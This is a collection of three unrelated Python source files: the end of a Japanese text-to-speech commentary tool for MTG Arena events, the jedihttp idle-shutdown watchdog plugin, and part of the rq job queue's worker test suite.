save=self.WAV_OUTPUT_DIR+"\\"+datetime.now().strftime('%Y%m%d_%H%M%S_%f')+"_"+self.get_speaker_name(cid)+"「"+text+"」.wav", \
volume=speak_param_obj.get(SpeakerParamKey.VOLUME), \
speed=speak_param_obj.get(SpeakerParamKey.SPEED), \
pitch=speak_param_obj.get(SpeakerParamKey.PITCH), \
alpha=speak_param_obj.get(SpeakerParamKey.ALPHA), \
intonation=speak_param_obj.get(SpeakerParamKey.INTONATION), \
emotionEP=speak_param_obj.get(SpeakerParamKey.EMOTION_EP), \
emotionP=speak_param_obj.get(SpeakerParamKey.EMOTION_P), \
overBanner=speak_param_obj.get(SpeakerParamKey.OVER_BANNER) \
)
with open(self.BAT_FOR_WAV_FILE, 'a') as af:
af.write(cmd+"\n")
return speaked_text
else:
return None
def on_message(self, ws, message):
parsed = self.parse(json.loads(message))
if parsed:
self.logger.debug(parsed)
cid = ""
text = ""
speak_param_obj = {}
cid, text, speak_param_obj = self.gen_text(parsed)
if cid and text:
speaker = self.get_speaker_name(cid)
if not speaker:
speaker = ""
self.logger.info(speaker+"「"+text+"」")
self.master_text.config(state="normal")
self.master_text.insert("end", speaker+"「"+text+"」\n")
self.master_text.yview_moveto(1)
self.master_text.config(state="disabled")
self.speak(cid, text, speak_param_obj)
def on_error(self, ws, error):
self.logger.error("error: called on_error")
self.logger.error(error)
def on_close(self, ws, close_status_code, close_msg):
self.logger.info("### websocket is closed ###")
if close_status_code:
self.logger.info("close_status_code: {}".format(close_status_code))
if close_msg:
self.logger.info("close message: {}".format(close_msg))
def on_open(self, ws):
def run(*args):
self.logger.info("### websocket is opened ###")
while(True):
line = sys.stdin.readline()
if line != "":
self.logger.debug("debug: sending value is " + line)
ws.send(line)
_thread.start_new_thread(run, ())
def process_running_check(self, process_postfix):
for proc in psutil.process_iter():
try:
if proc.exe().endswith(process_postfix):
return proc
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return None
def speak_config(self):
if self.config[ConfigKey.HERO_COMMENTARY_TYPE] == ConfigValue.SPEAKER1 and self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER1:
self.speak(self.config[ConfigKey.SPEAKER1][ConfigKey.CID], "自分と対戦相手のアクションを実況します。", save=False)
elif self.config[ConfigKey.HERO_COMMENTARY_TYPE] == ConfigValue.SPEAKER1 and self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER2:
self.speak(self.config[ConfigKey.SPEAKER1][ConfigKey.CID], "自分のアクションを実況します。", save=False)
self.speak(self.config[ConfigKey.SPEAKER2][ConfigKey.CID], "対戦相手のアクションを実況します。", save=False)
elif self.config[ConfigKey.HERO_COMMENTARY_TYPE] == ConfigValue.SPEAKER1:
self.speak(self.config[ConfigKey.SPEAKER1][ConfigKey.CID], "自分のアクションだけを実況します。", save=False)
elif self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER1:
self.speak(self.config[ConfigKey.SPEAKER1][ConfigKey.CID], "対戦相手のアクションだけを実況します。", save=False)
elif self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER2:
self.speak(self.config[ConfigKey.SPEAKER2][ConfigKey.CID], "対戦相手のアクションを実況します。", save=False)
def run(self):
self.logger.info("mtgatracker_backend.exe running check")
running = False
while not running:
mtgatracker_backend = self.process_running_check(ProcessName.MTGATRACKER_BACKEND)
running = True if mtgatracker_backend else False
if not running:
ans = messagebox.askyesno("mtgatracker_backend 起動確認", "{} プロセスが見つかりませんでした。\r\nmtgatracker_backendが起動していない可能性があります。\r\nはい: 再試行\r\nいいえ: 無視して続行".format(ProcessName.MTGATRACKER_BACKEND))
if ans == True:
pass
elif ans == False:
self.logger.info("mtgatracker_backend.exe running check: NG")
running = True
else:
self.logger.info("mtgatracker_backend.exe running check: OK")
self.logger.info("AssistantSeika running check")
running = False
while not running:
running = self.process_running_check(ProcessName.ASSISTANT_SEIKA)
if not running:
ans = messagebox.askyesno("AssistantSeika 起動確認", "{} プロセスが見つかりませんでした。\r\nAssistantSeikaが起動していない可能性があります。\r\nはい: 再試行\r\nいいえ: 無視して続行".format(ProcessName.ASSISTANT_SEIKA))
if ans == True:
pass
elif ans == False:
self.logger.info("AssistantSeika running check: NG")
running = True
else:
self.logger.info("AssistantSeika running check: OK")
self.logger.info(ProcessName.SEIKA_SAY2+" existence check")
running = False
while not running:
if os.path.exists(self.config.get(ConfigKey.SEIKA_SAY2_PATH)):
running = True
else:
messagebox.showinfo(ProcessName.SEIKA_SAY2+" 存在確認", "{} が見つかりませんでした。\r\nこの後に表示されるファイルダイアログで {} を選択してください。".format(ProcessName.SEIKA_SAY2, ProcessName.SEIKA_SAY2))
self.config[ConfigKey.SEIKA_SAY2_PATH] = filedialog.askopenfilename(filetype=[(ProcessName.SEIKA_SAY2,"*.exe")], initialdir=os.getcwd())
self.seikasay2 = SeikaSay2(self.config.get(ConfigKey.SEIKA_SAY2_PATH))
self.logger.info("Get speakers from AssistantSeika")
running = False
while not running:
self.get_speaker_list()
if self.cids:
running = True
self.logger.info("Get cids from AssistantSeika: OK")
break
else:
ans = messagebox.askyesno("AssistantSeika 話者一覧取得", "AssistantSeikaの話者一覧が空です。\r\n製品スキャンが未実行か、AssistantSeikaに対応している音声合成製品が未起動である可能性があります。\r\nはい: 再試行\r\nいいえ: 無視して続行")
if ans == True:
pass
elif ans == False:
self.logger.info("Get cids from AssistantSeika: NG")
running = True
self.logger.debug(self.speakers)
if not self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID):
self.config[ConfigKey.SPEAKER1][ConfigKey.CID] = self.cids[0]
if not self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.CID):
self.config[ConfigKey.SPEAKER2][ConfigKey.CID] = self.cids[0]
if not self.config[ConfigKey.SPEAKER1][ConfigKey.CID] in self.cids:
self.config[ConfigKey.SPEAKER1][ConfigKey.CID] = self.cids[0]
if not self.config[ConfigKey.SPEAKER2][ConfigKey.CID] in self.cids:
self.config[ConfigKey.SPEAKER2][ConfigKey.CID] = self.cids[0]
if self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] == ConfigValue.SPEAKER2:
self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] = ConfigValue.SPEAKER1
self.open_config_window()
self.logger.info("話者1: {}".format(self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.NAME)))
self.logger.info("話者2: {}".format(self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.NAME)))
self.speaker1_obj = self.load_speaker(self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID))
self.speaker2_obj = self.load_speaker(self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.CID))
self.start_ws_client()
self.speak_config()
self.master.mainloop()
#try:
# self.ws.run_forever()
#except KeyboardInterrupt:
# self.ws.close()
self.ws.close()
#mtgatracker_backendを停止
pid_list=[pc.pid for pc in mtgatracker_backend.children(recursive=True)]
for pid in pid_list:
psutil.Process(pid).terminate()
self.logger.debug("terminate 子プロセス {}" .format(pid))
mtgatracker_backend.terminate()
self.logger.debug("terminate 親プロセス {}" .format(mtgatracker_backend.pid))
if __name__ == "__main__":
#param = sys.argv
root = tkinter.Tk()
commentary_backend = CommentaryBackend(master=root)
commentary_backend.run()
|
watchdog_plugin.py
|
# Copyright 2017 Cedraro Andrea <a.cedraro@gmail.com>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import copy
import logging
from threading import Thread, Lock
from jedihttp.handlers import server_shutdown
class WatchdogPlugin(object):
"""
Bottle plugin (http://bottlepy.org/docs/dev/plugindev.html) for
automatically shutting down the server if no request is made within
|idle_suicide_seconds| seconds. Checks are done every
|check_interval_seconds| seconds.
"""
name = 'watchdog'
api = 2
def __init__(self, idle_suicide_seconds, check_interval_seconds):
self._logger = logging.getLogger(__name__)
self._check_interval_seconds = check_interval_seconds
self._idle_suicide_seconds = idle_suicide_seconds
# No need for a lock on wakeup time since only the watchdog thread ever
# reads or sets it.
self._last_wakeup_time = time.time()
self._last_request_time = time.time()
self._last_request_time_lock = Lock()
if idle_suicide_seconds <= 0:
return
self._watchdog_thread = Thread(target=self._watchdog_main)
self._watchdog_thread.daemon = True
self._watchdog_thread.start()
def _get_last_request_time(self):
with self._last_request_time_lock:
return copy.deepcopy(self._last_request_time)
def _set_last_request_time(self, last_request_time):
with self._last_request_time_lock:
self._last_request_time = last_request_time
def _time_since_last_request(self):
return time.time() - self._get_last_request_time()
def _time_since_last_wakeup(self):
return time.time() - self._last_wakeup_time
def _update_last_wakeup_time(self):
self._last_wakeup_time = time.time()
def _watchdog_main(self):
while True:
time.sleep(self._check_interval_seconds)
# We make sure we don't terminate if we skipped a wakeup time. If
# we skipped a check, that means the machine probably went to sleep
# and the client might still actually be up. In such cases, we give
# it one more wait interval to contact us before we die.
if (self._time_since_last_request() >
self._idle_suicide_seconds and
self._time_since_last_wakeup() <
2 * self._check_interval_seconds):
self._logger.info('Shutting down server due to inactivity.')
server_shutdown()
self._update_last_wakeup_time()
def __call__(self, callback):
def wrapper(*args, **kwargs):
self._set_last_request_time(time.time())
return callback(*args, **kwargs)
return wrapper
|
test_worker.py
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid,
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus
class CustomJob(Job):
pass
class CustomQueue(Queue):
pass
class TestWorker(RQTestCase):
def test_create_worker(self):
"""Worker creation using various inputs."""
# With single string argument
w = Worker('foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of strings
w = Worker(['foo', 'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
self.assertEqual(w.queue_names(), ['foo', 'bar'])
# With iterable of strings
w = Worker(iter(['foo', 'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# Also accept byte strings in Python 2
if PY2:
# With single byte string argument
w = Worker(b'foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of byte strings
w = Worker([b'foo', b'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With iterable of byte strings
w = Worker(iter([b'foo', b'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With single Queue
w = Worker(Queue('foo'))
self.assertEqual(w.queues[0].name, 'foo')
# With iterable of Queues
w = Worker(iter([Queue('foo'), Queue('bar')]))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With list of Queues
w = Worker([Queue('foo'), Queue('bar')])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With string and serializer
w = Worker('foo', serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
# With queue having serializer
w = Worker(Queue('foo'), serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo'), Queue('bar')
w = Worker([fooq, barq])
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_worker_all(self):
"""Worker.all() works properly"""
foo_queue = Queue('foo')
bar_queue = Queue('bar')
w1 = Worker([foo_queue, bar_queue], name='w1')
w1.register_birth()
w2 = Worker([foo_queue], name='w2')
w2.register_birth()
self.assertEqual(
set(Worker.all(connection=foo_queue.connection)),
set([w1, w2])
)
self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
w1.register_death()
w2.register_death()
def test_find_by_key(self):
"""Worker.find_by_key restores queues, state and job_id."""
queues = [Queue('foo'), Queue('bar')]
w = Worker(queues)
w.register_death()
w.register_birth()
w.set_state(WorkerStatus.STARTED)
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.queues, queues)
self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
self.assertEqual(worker._job_id, None)
self.assertTrue(worker.key in Worker.all_keys(worker.connection))
self.assertEqual(worker.version, VERSION)
# If worker is gone, its keys should also be removed
worker.connection.delete(worker.key)
Worker.find_by_key(worker.key)
self.assertFalse(worker.key in Worker.all_keys(worker.connection))
self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
"""Worker ttl."""
w = Worker([])
w.register_birth()
[worker_key] = self.testconn.smembers(Worker.redis_workers_keys)
self.assertIsNotNone(self.testconn.ttl(worker_key))
w.register_death()
def test_work_via_string_argument(self):
"""Worker processes work fed via string arguments."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Frank!')
def test_job_times(self):
"""job times are set correctly."""
q = Queue('foo')
w = Worker([q])
before = utcnow()
before = before.replace(microsecond=0)
job = q.enqueue(say_hello)
self.assertIsNotNone(job.enqueued_at)
self.assertIsNone(job.started_at)
self.assertIsNone(job.ended_at)
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Stranger!')
after = utcnow()
job.refresh()
self.assertTrue(
before <= job.enqueued_at <= after,
'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
)
self.assertTrue(
before <= job.started_at <= after,
'Not %s <= %s <= %s' % (before, job.started_at, after)
)
self.assertTrue(
before <= job.ended_at <= after,
'Not %s <= %s <= %s' % (before, job.ended_at, after)
)
def test_work_is_unreadable(self):
"""Unreadable jobs are put on the failed job registry."""
q = Queue()
self.assertEqual(q.count, 0)
# NOTE: We have to fake this enqueueing for this test case.
# What we're simulating here is a call to a function that is not
# importable from the worker process.
job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
job.save()
job_data = job.data
invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
assert job_data != invalid_data
self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
# We use the low-level internal function to enqueue any data (bypassing
# validity checks)
q.push_job_id(job.id)
self.assertEqual(q.count, 1)
# All set, we're going to process it
w = Worker([q])
w.work(burst=True) # should silently pass
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
def test_heartbeat(self):
"""Heartbeat saves last_heartbeat"""
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
self.assertEqual(w.hostname,
as_text(self.testconn.hget(w.key, 'hostname')))
last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
self.assertTrue(last_heartbeat is not None)
w = Worker.find_by_key(w.key)
self.assertIsInstance(w.last_heartbeat, datetime)
# worker.refresh() shouldn't fail if last_heartbeat is None
# for compatibility reasons
self.testconn.hdel(w.key, 'last_heartbeat')
w.refresh()
# worker.refresh() shouldn't fail if birth is None
# for compatibility reasons
self.testconn.hdel(w.key, 'birth')
w.refresh()
@slow
def test_heartbeat_busy(self):
"""Periodic heartbeats while horse is busy with long jobs"""
q = Queue()
w = Worker([q], job_monitoring_interval=5)
for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
job = q.enqueue(long_running_job,
args=(timeout,),
job_timeout=30,
result_ttl=-1)
with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
w.execute_job(job, q)
self.assertEqual(mocked.call_count, expected_heartbeats)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_work_fails(self):
"""Failing jobs are put on the failed queue."""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(div_by_zero)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
w.work(burst=True) # should silently pass
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_statistics(self):
"""Successful and failed job counts are saved properly"""
queue = Queue()
job = queue.enqueue(div_by_zero)
worker = Worker([queue])
worker.register_birth()
self.assertEqual(worker.failed_job_count, 0)
self.assertEqual(worker.successful_job_count, 0)
self.assertEqual(worker.total_working_time, 0)
registry = StartedJobRegistry(connection=worker.connection)
job.started_at = utcnow()
job.ended_at = job.started_at + timedelta(seconds=0.75)
worker.handle_job_failure(job)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 1)
self.assertEqual(worker.successful_job_count, 1)
self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds
worker.handle_job_failure(job)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 2)
self.assertEqual(worker.successful_job_count, 2)
self.assertEqual(worker.total_working_time, 3.0)
def test_total_working_time(self):
"""worker.total_working_time is stored properly"""
queue = Queue()
job = queue.enqueue(long_running_job, 0.05)
worker = Worker([queue])
worker.register_birth()
worker.perform_job(job, queue)
worker.refresh()
# total_working_time should be a little bit more than 0.05 seconds
self.assertGreaterEqual(worker.total_working_time, 0.05)
# in multi-user environments delays might be unpredictable,
# please adjust this magic limit accordingly in case if It takes even longer to run
self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
"""Worker exits after number of jobs complete."""
queue = Queue()
job1 = queue.enqueue(do_nothing)
job2 = queue.enqueue(do_nothing)
worker = Worker([queue])
worker.work(max_jobs=1)
self.assertEqual(JobStatus.FINISHED, job1.get_status())
self.assertEqual(JobStatus.QUEUED, job2.get_status())
def test_disable_default_exception_handler(self):
"""
Job is not moved to FailedJobRegistry when default custom exception
handler is disabled.
"""
queue = Queue(name='default', connection=self.testconn)
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=False)
worker.work(burst=True)
registry = FailedJobRegistry(queue=queue)
self.assertTrue(job in registry)
# Job is not added to FailedJobRegistry if
# disable_default_exception_handler is True
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=True)
worker.work(burst=True)
self.assertFalse(job in registry)
def test_custom_exc_handling(self):
"""Custom exception handling."""
def first_handler(job, *exc_info):
job.meta = {'first_handler': True}
job.save_meta()
return True
def second_handler(job, *exc_info):
job.meta.update({'second_handler': True})
job.save_meta()
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
q = Queue()
self.assertEqual(q.count, 0)
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=first_handler)
w.work(burst=True)
# Check the job
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, second_handler])
w.work(burst=True)
# Both custom exception handlers are run
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertTrue(job.meta['second_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, black_hole,
second_handler])
w.work(burst=True)
# second_handler is not run since it's interrupted by black_hole
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertEqual(job.meta.get('second_handler'), None)
def test_cancelled_jobs_arent_executed(self):
"""Cancelling jobs."""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
job = q.enqueue(create_file, SENTINEL_FILE)
# Here, we cancel the job, so the sentinel file may not be created
self.testconn.delete(job.key)
w = Worker([q])
w.work(burst=True)
assert q.count == 0
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow # noqa
def test_timeouts(self):
"""Worker kills jobs after timeout."""
sentinel_file = '/tmp/.rq_sentinel'
q = Queue()
w = Worker([q])
# Put it on the queue with a timeout value
res = q.enqueue(create_file_after_timeout,
args=(sentinel_file, 4),
job_timeout=1)
try:
os.unlink(sentinel_file)
except OSError as e:
if e.errno == 2:
pass
self.assertEqual(os.path.exists(sentinel_file), False)
w.work(burst=True)
self.assertEqual(os.path.exists(sentinel_file), False)
# TODO: Having to do the manual refresh() here is really ugly!
res.refresh()
self.assertIn('JobTimeoutException', as_text(res.exc_info))
def test_worker_sets_result_ttl(self):
"""Ensure that Worker properly sets result_ttl for individual jobs."""
q = Queue()
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertNotEqual(self.testconn.ttl(job.key), 0)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Job with -1 result_ttl don't expire
job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.ttl(job.key), -1)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Job with result_ttl = 0 gets deleted immediately
job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.get(job.key), None)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
def test_worker_sets_job_status(self):
"""Ensure that worker correctly sets job status."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello)
self.assertEqual(job.get_status(), JobStatus.QUEUED)
self.assertEqual(job.is_queued, True)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, False)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, True)
self.assertEqual(job.is_failed, False)
# Failed jobs should set status to "failed"
job = q.enqueue(div_by_zero, args=(1,))
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FAILED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, True)
def test_job_dependency(self):
"""Enqueue dependent jobs only if their parents don't fail"""
q = Queue()
w = Worker([q])
parent_job = q.enqueue(say_hello, result_ttl=0)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
parent_job = q.enqueue(div_by_zero)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
def test_get_current_job(self):
"""Ensure worker.get_current_job() works properly"""
q = Queue()
worker = Worker([q])
job = q.enqueue_call(say_hello)
self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None)
worker.set_current_job_id(job.id)
self.assertEqual(
worker.get_current_job_id(),
as_text(self.testconn.hget(worker.key, 'current_job'))
)
self.assertEqual(worker.get_current_job(), job)
def test_custom_job_class(self):
"""Ensure Worker accepts custom job class."""
q = Queue()
worker = Worker([q], job_class=CustomJob)
self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
"""Ensure Worker accepts custom queue class."""
q = CustomQueue()
worker = Worker([q], queue_class=CustomQueue)
self.assertEqual(worker.queue_class, CustomQueue)
def test_custom_queue_class_is_not_global(self):
"""Ensure Worker custom queue class is not global."""
q = CustomQueue()
worker_custom = Worker([q], queue_class=CustomQueue)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.queue_class, CustomQueue)
self.assertEqual(worker_generic.queue_class, Queue)
self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
"""Ensure Worker custom job class is not global."""
q = Queue()
worker_custom = Worker([q], job_class=CustomJob)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.job_class, CustomJob)
self.assertEqual(worker_generic.job_class, Job)
self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
"""Worker processes work, with forking disabled,
then returns."""
fooq, barq = Queue('foo'), Queue('bar')
w = SimpleWorker([fooq, barq])
self.assertEqual(w.work(burst=True), False,
'Did not expect any work on the queue.')
job = fooq.enqueue(say_pid)
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, os.getpid(),
'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
"""SimpleWorker's key must last longer than job.timeout when working"""
queue = Queue('foo')
worker = SimpleWorker([queue])
job_timeout = 300
job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout)
worker.work(burst=True)
job.refresh()
self.assertGreater(job.meta['ttl'], job_timeout)
def test_prepare_job_execution(self):
"""Prepare job execution does the necessary bookkeeping."""
queue = Queue(connection=self.testconn)
job = queue.enqueue(say_hello)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Updates worker statuses
self.assertEqual(worker.get_state(), 'busy')
self.assertEqual(worker.get_current_job_id(), job.id)
def test_prepare_job_execution_inf_timeout(self):
"""Prepare job execution handles infinite job timeout"""
queue = Queue(connection=self.testconn)
job = queue.enqueue(long_running_job,
args=(1,),
job_timeout=-1)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Score in queue is +inf
self.assertEqual(self.testconn.zscore(registry.key, job.id), float('Inf'))
def test_work_unicode_friendly(self):
"""Worker processes work with unicode description, then quits."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Adam',
description='你好 世界!')
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, 'Hi there, Adam!')
self.assertEqual(job.description, '你好 世界!')
def test_work_log_unicode_friendly(self):
"""Worker process work with unicode or str other than pure ascii content,
logging work properly"""
q = Queue("foo")
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
job = q.enqueue('tests.fixtures.say_hello_unicode', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
"""Test Pause Worker Execution"""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
q.enqueue(create_file, SENTINEL_FILE)
w = Worker([q])
suspend(self.testconn)
w.work(burst=True)
assert q.count == 1
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
resume(self.testconn)
w.work(burst=True)
assert q.count == 0
self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
q = Queue()
for _ in range(5):
q.enqueue(do_nothing)
w = Worker([q])
# This suspends workers for working for 2 second
suspend(self.testconn, 2)
# So when this burst of work happens the queue should remain at 5
w.work(burst=True)
assert q.count == 5
sleep(3)
# The suspension should be expired now, and a burst of work should now clear the queue
w.work(burst=True)
assert q.count == 0
def test_worker_hash_(self):
"""Workers are hashed by their .name attribute"""
q = Queue('foo')
w1 = Worker([q], name="worker1")
w2 = Worker([q], name="worker2")
w3 = Worker([q], name="worker1")
worker_set = set([w1, w2, w3])
self.assertEqual(len(worker_set), 2)
def test_worker_sets_birth(self):
"""Ensure worker correctly sets worker birth date."""
q = Queue()
w = Worker([q])
w.register_birth()
birth_date = w.birth_date
self.assertIsNotNone(birth_date)
self.assertEqual(type(birth_date).__name__, 'datetime')
def test_worker_sets_death(self):
"""Ensure worker correctly sets worker death date."""
q = Queue()
w = Worker([q])
w.register_death()
death_date = w.death_date
self.assertIsNotNone(death_date)
self.assertIsInstance(death_date, datetime)
def test_clean_queue_registries(self):
